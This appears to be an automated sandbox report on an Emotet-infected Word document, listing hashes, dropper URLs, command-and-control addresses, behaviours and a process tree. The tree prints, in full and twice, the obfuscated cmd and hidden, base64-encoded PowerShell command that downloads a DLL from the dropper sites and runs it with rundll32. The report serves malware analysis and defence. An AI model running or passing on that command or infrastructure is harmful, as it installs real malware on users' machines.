Analysis

  • max time kernel
    151s
  • max time network
    146s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    12-02-2021 18:48

General

  • Target

    715082.doc

  • Size

    159KB

  • MD5

    439c9779f4eb98afacdc55bb14e0f1f1

  • SHA1

    e2710777a7b7a97233b181f1080aa46cba8bcd27

  • SHA256

    be5a6da37fac071766412acb88d25ffd84dc8423a1e9c74c5cce310e12456b10

  • SHA512

    b59e497db0d4282940fc67194c95d9ce6ebbaf6b3666090bbc6843fd120f1d0775cf534d98b2b80e14a88a7522a1fef1b6628e8206206d03ad2b40a98cb84dc3

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://zhongsijiacheng.com/wp-content/jn5/

exe.dropper

http://artistascitizen.com/wp-content/Bx3cr6/

exe.dropper

http://ombchardin.com/archive/V/

exe.dropper

https://apsolution.work/magneti-marelli-zkkmb/toq7Eiy/

exe.dropper

https://happycheftv.com/wp-admin/z6uGcbY/

exe.dropper

https://careercoachconnection.com/tenderometer/4K/

exe.dropper

https://tacademicos.com/content/JbF68i/

Extracted

Family

emotet

Botnet

Epoch1

C2

181.10.46.92:80

2.58.16.88:8080

206.189.232.2:8080

178.250.54.208:8080

167.71.148.58:443

202.134.4.210:7080

187.162.248.237:80

78.206.229.130:80

85.214.26.7:8080

5.196.35.138:7080

1.226.84.243:8080

110.39.162.2:443

185.183.16.47:80

152.231.89.226:80

138.97.60.141:7080

94.176.234.118:443

46.101.58.37:8080

93.146.143.191:80

70.32.84.74:8080

137.74.106.111:7080

rsa_pubkey.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 6 IoCs
  • Loads dropped DLL 8 IoCs
  • Drops file in System32 directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 41 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\715082.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1872
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1612
    • C:\Windows\system32\cmd.exe
      cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IABTAFYAIAAgACgAIgBPAGsAIgArACIAQQAiACkAIAAgACgAIABbAHQAeQBQAGUAXQAoACIAewA2AH0AewA0AH0AewAzAH0AewAwAH0AewA1AH0AewAxAH0AewAyAH0AIgAtAGYAJwBpACcALAAnAEkAUgBlACcALAAnAGMAVABvAHIAeQAnACwAJwBlAG0ALgAnACwAJwBzAHQAJwAsACcAbwAuAEQAJwAsACcAUwB5ACcAKQApADsAIAAgACAAIAAkAEEAWgAxAEMAIAAgAD0AIAAgAFsAdABZAHAAZQBdACgAIgB7ADMAfQB7ADIAfQB7ADEAfQB7ADQAfQB7ADAAfQB7ADUAfQAiAC0ARgAgACcAcABvAGkATgBUAG0AQQBuACcALAAnAGUAdAAuACcALAAnAEUAbQAuAE4AJwAsACcAcwB5AFMAVAAnACwAJwBzAEUAcgBWAGkAYwBFACcALAAnAEEARwBlAFIAJwApACAAOwAgACQAWQBsAHUANwB5AG8AcwA9ACQAWQBfADgAQwAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUQAyADAAVwA7ACQAUAA5ADQASgA9ACgAKAAnAFQANQAnACsAJwBfACcAKQArACcAQwAnACkAOwAgACgAIAAgAEQASQByACAAKAAnAFYAYQAnACsAJwByAEkAQQBCACcAKwAnAEwARQA6AE8AJwArACcAawBBACcAKQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBjAHIARQBgAEEAdABgAGUAZABJAHIARQBjAGAAVABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcAdwBzACcAKwAnAEEAJwApACsAKAAnAEMAcwA0ACcAKwAnAGMAMwB2ACcAKQArACgAJwBsACcAKwAnAHcAcwBBAFUAJwApACsAKAAnAHAAeQB1AG0AJwArACcAOAAnACkAKwAoACcAMAAnACsAJwB3AHMAQQAnACkAKQAuACIAcgBFAFAAYABMAGEAQwBFACIAKAAoACcAdwAnACsAJwBzAEEAJwApACwAJwBcACcAKQApACkAOwAkAFYAMQA1AFcAPQAoACcARgA1ACcAKwAnADEARwAnACkAOwAgACgAIABHAGMAaQAgACgAJwBWAGEAUgBJAGEAJwArACcAQgAnACsAJwBMAGUAOgAnACsAJwBBAHoAMQBDACcAKQAgACkALgB2AGEATABVAEUAOgA6ACIAcwBlAGMAdQBgAFIAaQBgAFQAeQBgAHAAYABSAE8AVABPAEMAbwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsAHMAJwArACcAMQAyACcAKQApADsAJABVADEANABSAD0AKAAnAFQAJwArACgAJwA5ACcAKwAnADUARgAnACkAKQA7ACQARAA3AHMAaAA4AHgAZgAgAD0AIAAoACcASgAnACsAKAAnAF8AMwAnACsAJwBRACcAKQApADsAJABPADMANQBRAD0AKAAnAEUANQAnACsAJwA5AE8AJwApADsAJABVADEAawB0AGMANwBpAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AQwBzACcAKwAnADQAYwAzAHYAbAB7ACcAKwAnADAAfQAnACsAJwBVAHAAJwArACgAJwB5ACcAKwAnAHUAbQAnACkAKwAnADgAMAAnACsAJwB7ACcAKwAnADAAfQAnACkAIAAgAC0ARgAgAFsAQwBoAGEAcgBdADkAMgApACsAJABEADcAcwBoADgAeABmACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABXADYAOQBZAD0AKAAoACcARwAxACcAKwAnADcAJwApACsAJwBOACcAKQA7ACQATAByADIAaABzADkANwA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAEsAYQA3ADQAcAA1AGUAPQAoACcAcwAnACsAKAAnAGcAIAB5ACcAKwAnAHcAJwApACsAKAAnACAAYQAnACsAJwBoADoALwAnACsAJwAvACcAKQArACcAegAnACsAKAAnAGgAbwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnAHMAaQBqAGkAJwArACcAYQBjACcAKQArACgAJwBoACcAKwAnAGUAbgBnACcAKwAnAC4AYwAnACkAKwAnAG8AbQAnACsAKAAnAC8AdwBwAC0AYwAnACsAJwBvAG4AdABlAG4AJwArACcAdAAnACkAKwAoACcALwBqAG4ANQAvACEAJwArACcAcwAnACsAJwBnACcAKQArACcAIAB5ACcAKwAnAHcAJwArACgAJwAgAGEAaAA6ACcAKwAnAC8AJwApACsAJwAvACcAKwAoACcAYQByACcAKwAnAHQAaQBzACcAKQArACgAJwB0AGEAJwArACcAcwBjACcAKQArACgAJwBpAHQAaQB6ACcAKwAnAGUAbgAuAGMAJwArACcAbwBtAC8AdwBwACcAKQArACgAJwAtAGMAbwAnACsAJwBuACcAKQArACgAJwB0AGUAbgAnACsAJwB0ACcAKQArACgAJwAvAEIAeAAzACcAKwAnAGMAcgA2AC8AJwApACsAKAAnACEAcwBnACcAKwAnACAAJwApACsAJwB5ACcAKwAnAHcAIAAnACsAKAAnAGEAJwArACcAaAA6AC8ALwBvAG0AJwArACcAYgBjAGgAYQByACcAKwAnAGQAaQBuAC4AJwApACsAKAAnAGMAbwBtAC8AYQByAGMAJwArACcAaAAnACkAKwAnAGkAJwArACgAJwB2AGUAJwArACcALwBWACcAKwAnAC8AIQAnACsAJwBzAGcAIAAnACsAJwB5AHcAIABhAGgAJwApACsAKAAnAHMAOgAvAC8AYQBwACcAKwAnAHMAbwBsACcAKwAnAHUAdAAnACsAJwBpAG8AJwArACcAbgAnACkAKwAoACcALgAnACsAJwB3AG8AcgAnACkAKwAoACcAawAnACsAJwAvAG0AYQBnAG4AZQAnACkAKwAnAHQAJwArACgAJwBpAC0AbQBhACcAKwAnAHIAJwArACcAZQBsAGwAJwApACsAKAAnAGkAJwArACcALQB6AGsAJwArACcAawAnACsAJwBtAGIALwB0AG8AcQA3AEUAaQB5ACcAKwAnAC8AJwApACsAJwAhACcAKwAnAHMAZwAnACsAJwAgACcAKwAoACcAeQB3ACAAJwArACcAYQBoAHMAOgAnACsAJwAvAC8AaAAnACkAKwAnAGEAJwArACgAJwBwAHAAeQAnACsAJwBjACcAKwAnAGgAZQAnACsAJwBmAHQAdgAuAGMAbwBtAC8AJwArACcAdwBwAC0AYQAnACsAJwBkAG0AJwApACsAJwBpACcAKwAoACcAbgAvACcAKwAnAHoANgAnACkAKwAoACcAdQBHAGMAJwArACcAYgAnACsAJwBZAC8AIQAnACkAKwAoACcAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAaABzADoALwAnACsAJwAvAGMAYQByACcAKwAnAGUAJwApACsAJwBlAHIAJwArACcAYwAnACsAKAAnAG8AYQBjAGgAYwBvAG4AJwArACcAbgAnACkAKwAnAGUAJwArACcAYwAnACsAKAAnAHQAaQBvACcAKwAnAG4AJwArACcALgBjAG8AbQAvACcAKwAnAHQAJwArACcAZQBuAGQAZQByACcAKQArACgAJwBvACcAKwAnAG0AZQAnACkAKwAoACcAdABlAHIALwA0AEsAJwArACcALwAnACsAJwAhAHMAJwApACsAKAAnAGcAJwArACcAIAB5AHcAIABhACcAKwAnAGgAJwArACcAcwA6AC8ALwAnACkAKwAnAHQAYQAnACsAJwBjACcAKwAoACcAYQBkAGUAJwArACcAbQBpAGMAJwArACcAbwBzAC4AJwArACcAYwBvACcAKQArACgAJwBtAC8AYwBvACcAKwAnAG4AJwApACsAKAAnAHQAZQBuACcAKwAnAHQALwBKAGIARgA2ADgAJwArACcAaQAvACcAKQApAC4AIgBSAEUAUABMAGAAQQBDAGUAIgAoACgAJwBzACcAKwAoACcAZwAgACcAKwAnAHkAJwApACsAKAAnAHcAJwArACcAIABhAGgAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAG4AagAnACwAJwB0AHIAJwApACwAJwB5AGoAJwAsACcAcwBjACcALAAkAEwAcgAyAGgAcwA5ADcALAAnAHcAZAAnACkAWwAzAF0AKQAuACIAUwBgAFAAbABJAFQAIgAoACQATwA1ADgATAAgACsAIAAkAFkAbAB1ADcAeQBvAHMAIAArACAAJABBAF8AOQBSACkAOwAkAFcAMAAwAFcAPQAoACcAWgBfACcAKwAnADYASgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQBmAGMAdgBjADYAIABpAG4AIAAkAEsAYQA3ADQAcAA1AGUAKQB7AHQAcgB5AHsAKAAmACgAJwBOAGUAdwAtAE8AJwArACcAYgBqAGUAJwArACcAYwB0ACcAKQAgAFMAeQBTAFQARQBNAC4ATgBFAHQALgBXAEUAQgBjAEwASQBlAE4AdAApAC4AIgBEAE8AYAB3AG4AbABPAEEARABgAEYAaQBgAEwARQAiACgAJABOAGUAZgBjAHYAYwA2ACwAIAAkAFUAMQBrAHQAYwA3AGkAKQA7ACQATAAzADkAUQA9ACgAJwBIACcAKwAoACcAXwA1ACcAKwAnAEMAJwApACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQAVQAxAGsAdABjADcAaQApAC4AIgBMAGAAZQBOAGAARwBUAGgAIgAgAC0AZwBlACAAMwAzADUANwAxACkAIAB7AC4AKAAnAHIAdQBuAGQAbAAnACsAJwBsACcAKwAnADMAMgAnACkAIAAkAFUAMQBrAHQAYwA3AGkALAAoACgAJwBBACcAKwAnAG4AeQAnACkAKwAoACcAUwB0AHIAaQAnACsAJwBuACcAKQArACcAZwAnACkALgAiAHQATwBTAHQAYABSAGAAaQBOAGcAIgAoACkAOwAkAEoAOAAzAEsAPQAoACcATwAnACsAKAAnAF8AJwArACcANwBYACcAKQApADsAYgByAGUAYQBrADsAJABRADIANgBFAD0AKAAnAFIAXwAnACsAJwA0AEQAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABQADMANQBZAD0AKAAoACcAUAAnACsAJwAxADUAJwApACsAJwBVACcAKQA=
      1⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:656
      • C:\Windows\system32\msg.exe
        msg Admin /v Word experienced an error trying to open the file.
        2⤵
          PID:1184
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -w hidden -enc IABTAFYAIAAgACgAIgBPAGsAIgArACIAQQAiACkAIAAgACgAIABbAHQAeQBQAGUAXQAoACIAewA2AH0AewA0AH0AewAzAH0AewAwAH0AewA1AH0AewAxAH0AewAyAH0AIgAtAGYAJwBpACcALAAnAEkAUgBlACcALAAnAGMAVABvAHIAeQAnACwAJwBlAG0ALgAnACwAJwBzAHQAJwAsACcAbwAuAEQAJwAsACcAUwB5ACcAKQApADsAIAAgACAAIAAkAEEAWgAxAEMAIAAgAD0AIAAgAFsAdABZAHAAZQBdACgAIgB7ADMAfQB7ADIAfQB7ADEAfQB7ADQAfQB7ADAAfQB7ADUAfQAiAC0ARgAgACcAcABvAGkATgBUAG0AQQBuACcALAAnAGUAdAAuACcALAAnAEUAbQAuAE4AJwAsACcAcwB5AFMAVAAnACwAJwBzAEUAcgBWAGkAYwBFACcALAAnAEEARwBlAFIAJwApACAAOwAgACQAWQBsAHUANwB5AG8AcwA9ACQAWQBfADgAQwAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUQAyADAAVwA7ACQAUAA5ADQASgA9ACgAKAAnAFQANQAnACsAJwBfACcAKQArACcAQwAnACkAOwAgACgAIAAgAEQASQByACAAKAAnAFYAYQAnACsAJwByAEkAQQBCACcAKwAnAEwARQA6AE8AJwArACcAawBBACcAKQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBjAHIARQBgAEEAdABgAGUAZABJAHIARQBjAGAAVABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcAdwBzACcAKwAnAEEAJwApACsAKAAnAEMAcwA0ACcAKwAnAGMAMwB2ACcAKQArACgAJwBsACcAKwAnAHcAcwBBAFUAJwApACsAKAAnAHAAeQB1AG0AJwArACcAOAAnACkAKwAoACcAMAAnACsAJwB3AHMAQQAnACkAKQAuACIAcgBFAFAAYABMAGEAQwBFACIAKAAoACcAdwAnACsAJwBzAEEAJwApACwAJwBcACcAKQApACkAOwAkAFYAMQA1AFcAPQAoACcARgA1ACcAKwAnADEARwAnACkAOwAgACgAIABHAGMAaQAgACgAJwBWAGEAUgBJAGEAJwArACcAQgAnACsAJwBMAGUAOgAnACsAJwBBAHoAMQBDACcAKQAgACkALgB2AGEATABVAEUAOgA6ACIAcwBlAGMAdQBgAFIAaQBgAFQAeQBgAHAAYABSAE8AVABPAEMAbwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsAHMAJwArACcAMQAyACcAKQApADsAJABVADEANABSAD0AKAAnAFQAJwArACgAJwA5ACcAKwAnADUARgAnACkAKQA7ACQARAA3AHMAaAA4AHgAZgAgAD0AIAAoACcASgAnACsAKAAnAF8AMwAnACsAJwBRACcAKQApADsAJABPADMANQBRAD0AKAAnAEUANQAnACsAJwA5AE8AJwApADsAJABVADEAawB0AGMANwBpAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AQwBzACcAKwAnADQAYwAzAHYAbAB7ACcAKwAnADAAfQAnACsAJwBVAHAAJwArACgAJwB5ACcAKwAnAHUAbQAnACkAKwAnADgAMAAnACsAJwB7ACcAKwAnADAAfQAnACkAIAAgAC0ARgAgAFsAQwBoAGEAcgBdADkAMgApACsAJABEADcAcwBoADgAeABmACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABXADYAOQBZAD0AKAAoACcARwAxACcAKwAnADcAJwApACsAJwBOACcAKQA7ACQATAByADIAaABzADkANwA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAEsAYQA3ADQAcAA1AGUAPQAoACcAcwAnACsAKAAnAGcAIAB5ACcAKwAnAHcAJwApACsAKAAnACAAYQAnACsAJwBoADoALwAnACsAJwAvACcAKQArACcAegAnACsAKAAnAGgAbwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnAHMAaQBqAGkAJwArACcAYQBjACcAKQArACgAJwBoACcAKwAnAGUAbgBnACcAKwAnAC4AYwAnACkAKwAnAG8AbQAnACsAKAAnAC8AdwBwAC0AYwAnACsAJwBvAG4AdABlAG4AJwArACcAdAAnACkAKwAoACcALwBqAG4ANQAvACEAJwArACcAcwAnACsAJwBnACcAKQArACcAIAB5ACcAKwAnAHcAJwArACgAJwAgAGEAaAA6ACcAKwAnAC8AJwApACsAJwAvACcAKwAoACcAYQByACcAKwAnAHQAaQBzACcAKQArACgAJwB0AGEAJwArACcAcwBjACcAKQArACgAJwBpAHQAaQB6ACcAKwAnAGUAbgAuAGMAJwArACcAbwBtAC8AdwBwACcAKQArACgAJwAtAGMAbwAnACsAJwBuACcAKQArACgAJwB0AGUAbgAnACsAJwB0ACcAKQArACgAJwAvAEIAeAAzACcAKwAnAGMAcgA2AC8AJwApACsAKAAnACEAcwBnACcAKwAnACAAJwApACsAJwB5ACcAKwAnAHcAIAAnACsAKAAnAGEAJwArACcAaAA6AC8ALwBvAG0AJwArACcAYgBjAGgAYQByACcAKwAnAGQAaQBuAC4AJwApACsAKAAnAGMAbwBtAC8AYQByAGMAJwArACcAaAAnACkAKwAnAGkAJwArACgAJwB2AGUAJwArACcALwBWACcAKwAnAC8AIQAnACsAJwBzAGcAIAAnACsAJwB5AHcAIABhAGgAJwApACsAKAAnAHMAOgAvAC8AYQBwACcAKwAnAHMAbwBsACcAKwAnAHUAdAAnACsAJwBpAG8AJwArACcAbgAnACkAKwAoACcALgAnACsAJwB3AG8AcgAnACkAKwAoACcAawAnACsAJwAvAG0AYQBnAG4AZQAnACkAKwAnAHQAJwArACgAJwBpAC0AbQBhACcAKwAnAHIAJwArACcAZQBsAGwAJwApACsAKAAnAGkAJwArACcALQB6AGsAJwArACcAawAnACsAJwBtAGIALwB0AG8AcQA3AEUAaQB5ACcAKwAnAC8AJwApACsAJwAhACcAKwAnAHMAZwAnACsAJwAgACcAKwAoACcAeQB3ACAAJwArACcAYQBoAHMAOgAnACsAJwAvAC8AaAAnACkAKwAnAGEAJwArACgAJwBwAHAAeQAnACsAJwBjACcAKwAnAGgAZQAnACsAJwBmAHQAdgAuAGMAbwBtAC8AJwArACcAdwBwAC0AYQAnACsAJwBkAG0AJwApACsAJwBpACcAKwAoACcAbgAvACcAKwAnAHoANgAnACkAKwAoACcAdQBHAGMAJwArACcAYgAnACsAJwBZAC8AIQAnACkAKwAoACcAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAaABzADoALwAnACsAJwAvAGMAYQByACcAKwAnAGUAJwApACsAJwBlAHIAJwArACcAYwAnACsAKAAnAG8AYQBjAGgAYwBvAG4AJwArACcAbgAnACkAKwAnAGUAJwArACcAYwAnACsAKAAnAHQAaQBvACcAKwAnAG4AJwArACcALgBjAG8AbQAvACcAKwAnAHQAJwArACcAZQBuAGQAZQByACcAKQArACgAJwBvACcAKwAnAG0AZQAnACkAKwAoACcAdABlAHIALwA0AEsAJwArACcALwAnACsAJwAhAHMAJwApACsAKAAnAGcAJwArACcAIAB5AHcAIABhACcAKwAnAGgAJwArACcAcwA6AC8ALwAnACkAKwAnAHQAYQAnACsAJwBjACcAKwAoACcAYQBkAGUAJwArACcAbQBpAGMAJwArACcAbwBzAC4AJwArACcAYwBvACcAKQArACgAJwBtAC8AYwBvACcAKwAnAG4AJwApACsAKAAnAHQAZQBuACcAKwAnAHQALwBKAGIARgA2ADgAJwArACcAaQAvACcAKQApAC4AIgBSAEUAUABMAGAAQQBDAGUAIgAoACgAJwBzACcAKwAoACcAZwAgACcAKwAnAHkAJwApACsAKAAnAHcAJwArACcAIABhAGgAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAG4AagAnACwAJwB0AHIAJwApACwAJwB5AGoAJwAsACcAcwBjACcALAAkAEwAcgAyAGgAcwA5ADcALAAnAHcAZAAnACkAWwAzAF0AKQAuACIAUwBgAFAAbABJAFQAIgAoACQATwA1ADgATAAgACsAIAAkAFkAbAB1ADcAeQBvAHMAIAArACAAJABBAF8AOQBSACkAOwAkAFcAMAAwAFcAPQAoACcAWgBfACcAKwAnADYASgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQBmAGMAdgBjADYAIABpAG4AIAAkAEsAYQA3ADQAcAA1AGUAKQB7AHQAcgB5AHsAKAAmACgAJwBOAGUAdwAtAE8AJwArACcAYgBqAGUAJwArACcAYwB0ACcAKQAgAFMAeQBTAFQARQBNAC4ATgBFAHQALgBXAEUAQgBjAEwASQBlAE4AdAApAC4AIgBEAE8AYAB3AG4AbABPAEEARABgAEYAaQBgAEwARQAiACgAJABOAGUAZgBjAHYAYwA2ACwAIAAkAFUAMQBrAHQAYwA3AGkAKQA7ACQATAAzADkAUQA9ACgAJwBIACcAKwAoACcAXwA1ACcAKwAnAEMAJwApACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQAVQAxAGsAdABjADcAaQApAC4AIgBMAGAAZQBOAGAARwBUAGgAIgAgAC0AZwBlACAAMwAzADUANwAxACkAIAB7AC4AKAAnAHIAdQBuAGQAbAAnACsAJwBsACcAKwAnADMAMgAnACkAIAAkAFUAMQBrAHQAYwA3AGkALAAoACgAJwBBACcAKwAnAG4AeQAnACkAKwAoACcAUwB0AHIAaQAnACsAJwBuACcAKQArACcAZwAnACkALgAiAHQATwBTAHQAYABSAGAAaQBOAGcAIgAoACkAOwAkAEoAOAAzAEsAPQAoACcATwAnACsAKAAnAF8AJwArACcANwBYACcAKQApADsAYgByAGUAYQBrADsAJABRADIANgBFAD0AKAAnAFIAXwAnACsAJwA0AEQAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABQADMANQBZAD0AKAAoACcAUAAnACsAJwAxADUAJwApACsAJwBVACcAKQA=
          2⤵
          • Blocklisted process makes network request
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1120
          • C:\Windows\system32\rundll32.exe
            "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Cs4c3vl\Upyum80\J_3Q.dll AnyString
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1056
            • C:\Windows\SysWOW64\rundll32.exe
              "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Cs4c3vl\Upyum80\J_3Q.dll AnyString
              4⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:1380
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\Users\Admin\Cs4c3vl\Upyum80\J_3Q.dll",#1
                5⤵
                • Loads dropped DLL
                • Drops file in System32 directory
                • Suspicious use of WriteProcessMemory
                PID:1736
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Iyhrrnymibbef\mengjxufpnzz.ojz",VExuhnWQbA
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1472
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Iyhrrnymibbef\mengjxufpnzz.ojz",#1
                    7⤵
                    • Blocklisted process makes network request
                    • Suspicious behavior: EnumeratesProcesses
                    PID:896

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Defense Evasion

      Modify Registry

      1
      T1112

      Discovery

      System Information Discovery

      1
      T1082

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\Cs4c3vl\Upyum80\J_3Q.dll
        MD5

        782f98c00905f1b80f0dfc6dc287cd6e

        SHA1

        6575caf3d68d899e83c4b352e985f86b53e804c7

        SHA256

        06040e1406a3b99da60e639edcf14ddb1f3c812993b408a8164285f2a580caaf

        SHA512

        cd2a5e6f9d9f22cbf2e215d74dde5dbae107e14ac356bf47dfa4a4f1dd00d9399bf073bf67139a83a4bb29cd6e7081f832348ba6183aefd7a1faafceae890ed6

      • \Users\Admin\Cs4c3vl\Upyum80\J_3Q.dll
        MD5

        782f98c00905f1b80f0dfc6dc287cd6e

        SHA1

        6575caf3d68d899e83c4b352e985f86b53e804c7

        SHA256

        06040e1406a3b99da60e639edcf14ddb1f3c812993b408a8164285f2a580caaf

        SHA512

        cd2a5e6f9d9f22cbf2e215d74dde5dbae107e14ac356bf47dfa4a4f1dd00d9399bf073bf67139a83a4bb29cd6e7081f832348ba6183aefd7a1faafceae890ed6

      • \Users\Admin\Cs4c3vl\Upyum80\J_3Q.dll
        MD5

        782f98c00905f1b80f0dfc6dc287cd6e

        SHA1

        6575caf3d68d899e83c4b352e985f86b53e804c7

        SHA256

        06040e1406a3b99da60e639edcf14ddb1f3c812993b408a8164285f2a580caaf

        SHA512

        cd2a5e6f9d9f22cbf2e215d74dde5dbae107e14ac356bf47dfa4a4f1dd00d9399bf073bf67139a83a4bb29cd6e7081f832348ba6183aefd7a1faafceae890ed6

      • \Users\Admin\Cs4c3vl\Upyum80\J_3Q.dll
        MD5

        782f98c00905f1b80f0dfc6dc287cd6e

        SHA1

        6575caf3d68d899e83c4b352e985f86b53e804c7

        SHA256

        06040e1406a3b99da60e639edcf14ddb1f3c812993b408a8164285f2a580caaf

        SHA512

        cd2a5e6f9d9f22cbf2e215d74dde5dbae107e14ac356bf47dfa4a4f1dd00d9399bf073bf67139a83a4bb29cd6e7081f832348ba6183aefd7a1faafceae890ed6

      • \Users\Admin\Cs4c3vl\Upyum80\J_3Q.dll
        MD5

        782f98c00905f1b80f0dfc6dc287cd6e

        SHA1

        6575caf3d68d899e83c4b352e985f86b53e804c7

        SHA256

        06040e1406a3b99da60e639edcf14ddb1f3c812993b408a8164285f2a580caaf

        SHA512

        cd2a5e6f9d9f22cbf2e215d74dde5dbae107e14ac356bf47dfa4a4f1dd00d9399bf073bf67139a83a4bb29cd6e7081f832348ba6183aefd7a1faafceae890ed6

      • \Users\Admin\Cs4c3vl\Upyum80\J_3Q.dll
        MD5

        782f98c00905f1b80f0dfc6dc287cd6e

        SHA1

        6575caf3d68d899e83c4b352e985f86b53e804c7

        SHA256

        06040e1406a3b99da60e639edcf14ddb1f3c812993b408a8164285f2a580caaf

        SHA512

        cd2a5e6f9d9f22cbf2e215d74dde5dbae107e14ac356bf47dfa4a4f1dd00d9399bf073bf67139a83a4bb29cd6e7081f832348ba6183aefd7a1faafceae890ed6

      • \Users\Admin\Cs4c3vl\Upyum80\J_3Q.dll
        MD5

        782f98c00905f1b80f0dfc6dc287cd6e

        SHA1

        6575caf3d68d899e83c4b352e985f86b53e804c7

        SHA256

        06040e1406a3b99da60e639edcf14ddb1f3c812993b408a8164285f2a580caaf

        SHA512

        cd2a5e6f9d9f22cbf2e215d74dde5dbae107e14ac356bf47dfa4a4f1dd00d9399bf073bf67139a83a4bb29cd6e7081f832348ba6183aefd7a1faafceae890ed6

      • \Users\Admin\Cs4c3vl\Upyum80\J_3Q.dll
        MD5

        782f98c00905f1b80f0dfc6dc287cd6e

        SHA1

        6575caf3d68d899e83c4b352e985f86b53e804c7

        SHA256

        06040e1406a3b99da60e639edcf14ddb1f3c812993b408a8164285f2a580caaf

        SHA512

        cd2a5e6f9d9f22cbf2e215d74dde5dbae107e14ac356bf47dfa4a4f1dd00d9399bf073bf67139a83a4bb29cd6e7081f832348ba6183aefd7a1faafceae890ed6

      • \Users\Admin\Cs4c3vl\Upyum80\J_3Q.dll
        MD5

        782f98c00905f1b80f0dfc6dc287cd6e

        SHA1

        6575caf3d68d899e83c4b352e985f86b53e804c7

        SHA256

        06040e1406a3b99da60e639edcf14ddb1f3c812993b408a8164285f2a580caaf

        SHA512

        cd2a5e6f9d9f22cbf2e215d74dde5dbae107e14ac356bf47dfa4a4f1dd00d9399bf073bf67139a83a4bb29cd6e7081f832348ba6183aefd7a1faafceae890ed6

      • memory/896-37-0x0000000000000000-mapping.dmp
      • memory/1056-17-0x0000000000000000-mapping.dmp
      • memory/1120-15-0x000000001B940000-0x000000001B941000-memory.dmp
        Filesize

        4KB

      • memory/1120-13-0x000000001AA34000-0x000000001AA36000-memory.dmp
        Filesize

        8KB

      • memory/1120-8-0x000007FEF50B0000-0x000007FEF5A9C000-memory.dmp
        Filesize

        9.9MB

      • memory/1120-16-0x000000001C410000-0x000000001C411000-memory.dmp
        Filesize

        4KB

      • memory/1120-12-0x000000001AA30000-0x000000001AA32000-memory.dmp
        Filesize

        8KB

      • memory/1120-7-0x000007FEFBA01000-0x000007FEFBA03000-memory.dmp
        Filesize

        8KB

      • memory/1120-14-0x0000000001FA0000-0x0000000001FA1000-memory.dmp
        Filesize

        4KB

      • memory/1120-9-0x000000001A940000-0x000000001A941000-memory.dmp
        Filesize

        4KB

      • memory/1120-6-0x0000000000000000-mapping.dmp
